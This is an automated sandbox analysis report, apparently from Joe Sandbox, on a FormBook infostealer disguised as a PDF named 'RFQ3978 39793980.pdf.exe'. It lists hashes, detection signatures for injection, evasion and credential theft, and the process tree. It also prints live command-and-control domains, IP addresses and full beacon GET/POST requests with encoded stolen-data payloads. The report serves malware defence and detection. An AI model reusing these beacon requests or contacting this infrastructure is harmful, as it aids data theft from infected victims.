Windows Analysis Report
RFQ3978 39793980.pdf.exe

Overview

General Information

Sample name: RFQ3978 39793980.pdf.exe
Analysis ID: 1574079
MD5: 3979572152f3fb2b98211eeb761309af
SHA1: 67e622f51e4c1f128ac003e2132b26a87a582a6d
SHA256: 7f3a6082c0ab2b881863c4dfe7328ef497155d2d962fa4a1976a5c26ec1d4e66
Tags: exe, user-abuse_ch
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • RFQ3978 39793980.pdf.exe (PID: 6668 cmdline: "C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe" MD5: 3979572152F3FB2B98211EEB761309AF)
    • MSBuild.exe (PID: 4856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • shazRxxmQwU.exe (PID: 5572 cmdline: "C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • regini.exe (PID: 5576 cmdline: "C:\Windows\SysWOW64\regini.exe" MD5: C99C3BB423097FCF4990539FC1ED60E3)
          • shazRxxmQwU.exe (PID: 5728 cmdline: "C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3520 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3560935486.0000000002A20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000007.00000002.3560872245.00000000029D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000005.00000002.2352816417.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

Source | Rule | Description | Author | Strings
5.2.MSBuild.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
5.2.MSBuild.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

                System Summary

                Source: Process started, Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe", CommandLine: "C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe, NewProcessName: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe, OriginalFileName: C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe", ProcessId: 6668, ProcessName: RFQ3978 39793980.pdf.exe
                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-12T21:48:14.890184+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49793 | 104.21.95.160 | 80 | TCP
                2024-12-12T21:49:00.394420+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49852 | 43.199.54.158 | 80 | TCP
                2024-12-12T21:49:15.562392+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49936 | 154.88.22.105 | 80 | TCP
                2024-12-12T21:49:30.751909+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49973 | 154.23.184.95 | 80 | TCP
                2024-12-12T21:49:45.654891+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50012 | 161.97.142.144 | 80 | TCP
                2024-12-12T21:50:00.513086+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 50028 | 66.29.149.46 | 80 | TCP

                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-12T21:48:31.978767+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49829 | 43.199.54.158 | 80 | TCP
                2024-12-12T21:48:34.636274+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49835 | 43.199.54.158 | 80 | TCP
                2024-12-12T21:48:37.313787+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49841 | 43.199.54.158 | 80 | TCP
                2024-12-12T21:49:07.463159+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49913 | 154.88.22.105 | 80 | TCP
                2024-12-12T21:49:10.119468+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49923 | 154.88.22.105 | 80 | TCP
                2024-12-12T21:49:12.801205+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49930 | 154.88.22.105 | 80 | TCP
                2024-12-12T21:49:22.697579+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49952 | 154.23.184.95 | 80 | TCP
                2024-12-12T21:49:25.372601+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49959 | 154.23.184.95 | 80 | TCP
                2024-12-12T21:49:28.058440+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49967 | 154.23.184.95 | 80 | TCP
                2024-12-12T21:49:37.743891+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49990 | 161.97.142.144 | 80 | TCP
                2024-12-12T21:49:40.369735+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49997 | 161.97.142.144 | 80 | TCP
                2024-12-12T21:49:42.990482+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50004 | 161.97.142.144 | 80 | TCP
                2024-12-12T21:49:52.512820+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50025 | 66.29.149.46 | 80 | TCP
                2024-12-12T21:49:55.206949+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50026 | 66.29.149.46 | 80 | TCP
                2024-12-12T21:49:57.911741+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 50027 | 66.29.149.46 | 80 | TCP

                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-12-12T21:48:31.978767+0100 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.4 | 49829 | 43.199.54.158 | 80 | TCP

                AV Detection

                Source: RFQ3978 39793980.pdf.exe, Avira: detected
                Source: Yara match, File source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match, File source: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3560935486.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000007.00000002.3560872245.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.2352816417.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000008.00000002.3560408446.0000000001230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000006.00000002.3561019858.00000000039F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match, File source: 00000005.00000002.2354528034.0000000002830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
                Source: RFQ3978 39793980.pdf.exe, Joe Sandbox ML: detected
                Source: RFQ3978 39793980.pdf.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: RFQ3978 39793980.pdf.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: shazRxxmQwU.exe, 00000006.00000002.3560481153.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp, shazRxxmQwU.exe, 00000008.00000002.3559802937.0000000000B8E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: regini.exe, 00000007.00000002.3560035805.00000000027CD000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561717968.000000000336C000.00000004.10000000.00040000.00000000.sdmp, shazRxxmQwU.exe, 00000008.00000002.3561378450.000000000317C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2649875602.000000000D90C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2355221160.0000000002B8B000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2352532116.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, regini.exe, regini.exe, 00000007.00000003.2355221160.0000000002B8B000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002EDE000.00000040.00001000.00020000.00000000.sdmp, regini.exe, 00000007.00000003.2352532116.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, regini.exe, 00000007.00000002.3561278322.0000000002D40000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: regini.pdbGCTL source: MSBuild.exe, 00000005.00000002.2352511009.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560223659.00000000007D8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: regini.pdb source: MSBuild.exe, 00000005.00000002.2352511009.0000000000C88000.00000004.00000020.00020000.00000000.sdmp, shazRxxmQwU.exe, 00000006.00000002.3560223659.00000000007D8000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 7_2_004BC530 FindFirstFileW,FindNextFileW,FindClose, 7_2_004BC530
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 4x nop then xor eax, eax 7_2_004A9EE0
                Source: C:\Windows\SysWOW64\regini.exe, Code function: 4x nop then mov ebx, 00000004h 7_2_02B104DE

                Networking

                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49793 -> 104.21.95.160:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49829 -> 43.199.54.158:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49835 -> 43.199.54.158:80
                Source: Network traffic, Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49829 -> 43.199.54.158:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49852 -> 43.199.54.158:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49841 -> 43.199.54.158:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49913 -> 154.88.22.105:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49930 -> 154.88.22.105:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49923 -> 154.88.22.105:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49936 -> 154.88.22.105:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49952 -> 154.23.184.95:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49973 -> 154.23.184.95:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49967 -> 154.23.184.95:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49959 -> 154.23.184.95:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50012 -> 161.97.142.144:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 66.29.149.46:80
                Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50028 -> 66.29.149.46:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 66.29.149.46:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50004 -> 161.97.142.144:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 66.29.149.46:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49997 -> 161.97.142.144:80
                Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49990 -> 161.97.142.144:80
                Source: DNS query: www.030002350.xyz
                Source: Joe Sandbox View, IP Address: 161.97.142.144
                Source: Joe Sandbox View, IP Address: 154.23.184.95
                Source: Joe Sandbox View, ASN Name: CONTABODE
                Source: Joe Sandbox View, ASN Name: LILLY-ASUS
                Source: Joe Sandbox View, ASN Name: COGENT-174US
                Source: unknown, TCP traffic detected without corresponding DNS query: 173.222.162.32
                Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic, HTTP traffic detected: GET /7nvw/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=bbdDITTjVn5ZxI6BCVqDUznXmSvHXBsPP+WRiGeKfyb/2X6tLhCWc3R74LhPSoYzFVfNV33VjCQJaZkJOo229jlS83e+IdiqUppR8vJ/svaOFLmkzPo3ErA= HTTP/1.1 Host: www.vayui.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global traffic, HTTP traffic detected: GET /iodk/?YdDTnh=dmGO6CepyY0nvsEaxU7IYLSZuGbeWFuYSER1oXhei8AaXzs2ne8+dyZVwWklDlgafwdROfr4xQPj+g6hlFS8zW1LJxia/FKHRGC6CNVENRR1k9XuyS8IPZU=&-n-l=OFJhRZgx2zhDqHF HTTP/1.1 Host: www.327531.buzz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global traffic, HTTP traffic detected: GET /63n1/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=wxKP0Ki1Kkw6YH74oBqG30+iQCgiXWBSdqxOdzuCPyveB98x1djFf0ZtvUhWTFSc0EIYzppqTCA/sqplXndAssyXGlxUbFrZ1byk2GCNxKon0UhL377cjTQ= HTTP/1.1 Host: www.cg19g5.pro Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global traffic, HTTP traffic detected: GET /ebw6/?YdDTnh=g7KNPNtXo04gJA8d7gjB2LBtOKC/EZQd0JNEKh4/LAY7mt0u3u5aX//D26eCeQ1UgdXt5Q7OBZBmmBkcIEzHCYDBDYgNJRKGsOkt2pAFFHXhbKxNJb1Qwag=&-n-l=OFJhRZgx2zhDqHF HTTP/1.1 Host: www.hm35s.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global traffic, HTTP traffic detected: GET /1a7n/?-n-l=OFJhRZgx2zhDqHF&YdDTnh=SzU1l/tTxwo1yS+S+GBkbH76tCzhfB/g3n0B8tGNiWfp8ksCFQPrr+3wpvFapjtE3GYokdEi3N4/HopXjg+LHnHi2Aut5Kfel96F5pIIk9Rh6xpkwimlquw= HTTP/1.1 Host: www.030002350.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global traffic, HTTP traffic detected: GET /a5zo/?YdDTnh=G5VPERT9FhRGJhNIRpmoyXcxrAHSeRDYD481MD187sPPhEeAXpBmYE5VzzyVUlrKlAIY3hSLkfzvU4FcgkoVbU14woS6WrnDZ9EPDWXrZ28nzgl0lvFto1M=&-n-l=OFJhRZgx2zhDqHF HTTP/1.1 Host: www.elitevibes.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4
                Source: global traffic, DNS traffic detected: DNS query: www.vayui.top
                Source: global traffic, DNS traffic detected: DNS query: www.327531.buzz
                Source: global traffic, DNS traffic detected: DNS query: www.cg19g5.pro
                Source: global traffic, DNS traffic detected: DNS query: www.hm35s.top
                Source: global traffic, DNS traffic detected: DNS query: www.030002350.xyz
                Source: global traffic, DNS traffic detected: DNS query: www.elitevibes.top
                Source: unknownHTTP traffic detected: POST /iodk/ HTTP/1.1Host: www.327531.buzzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.327531.buzzReferer: http://www.327531.buzz/iodk/Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Content-Length: 203Connection: closeUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/44.0.2403.67 Mobile/12H143 Safari/600.1.4Data Raw: 59 64 44 54 6e 68 3d 51 6b 75 75 35 31 62 6d 2b 4a 4a 32 75 6f 34 51 69 45 6e 68 59 75 32 49 69 79 53 33 59 47 69 2f 56 55 67 69 39 58 4e 66 6d 70 63 43 59 67 4e 32 67 4a 55 72 4f 54 35 4d 39 43 73 64 58 55 64 64 57 45 38 4f 54 74 44 35 38 43 76 41 2f 56 2b 32 6d 57 33 6b 75 6b 63 72 56 43 71 57 77 67 43 35 5a 6c 43 58 41 38 5a 4e 4f 57 6b 67 6b 6f 2f 51 34 54 63 58 66 62 61 44 61 32 46 47 38 4f 76 77 56 74 77 50 70 67 4b 46 2b 4a 69 51 2b 50 54 77 2f 4d 32 79 61 73 39 61 46 4b 37 74 2b 52 6a 4a 5a 47 52 61 39 66 55 33 49 47 77 44 48 4e 55 38 34 6b 36 7a 48 39 6b 75 35 62 69 51 49 50 75 44 4c 51 3d 3d Data Ascii: YdDTnh=Qkuu51bm+JJ2uo4QiEnhYu2IiyS3YGi/VUgi9XNfmpcCYgN2gJUrOT5M9CsdXUddWE8OTtD58CvA/V+2mW3kukcrVCqWwgC5ZlCXA8ZNOWkgko/Q4TcXfbaDa2FG8OvwVtwPpgKF+JiQ+PTw/M2yas9aFK7t+RjJZGRa9fU3IGwDHNU84k6zH9ku5biQIPuDLQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 12 Dec 2024 20:48:14 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BlQX96oRm1u4q84MAIlilOHWBs91qFyKR9vQrP1hbBjv9hp0BZTwOnfY7K8czr2GBiyMuEu%2FMdgZwoMFtQAtC7y1n2N3sl0CJfwARvR80YGdpxGph%2BrW6HkQag2sJlPC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1092fb1ff0c470-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1517&min_rtt=1517&rtt_var=758&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=506&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:22 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:25 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 12 Dec 2024 20:49:27 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66a5f968-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
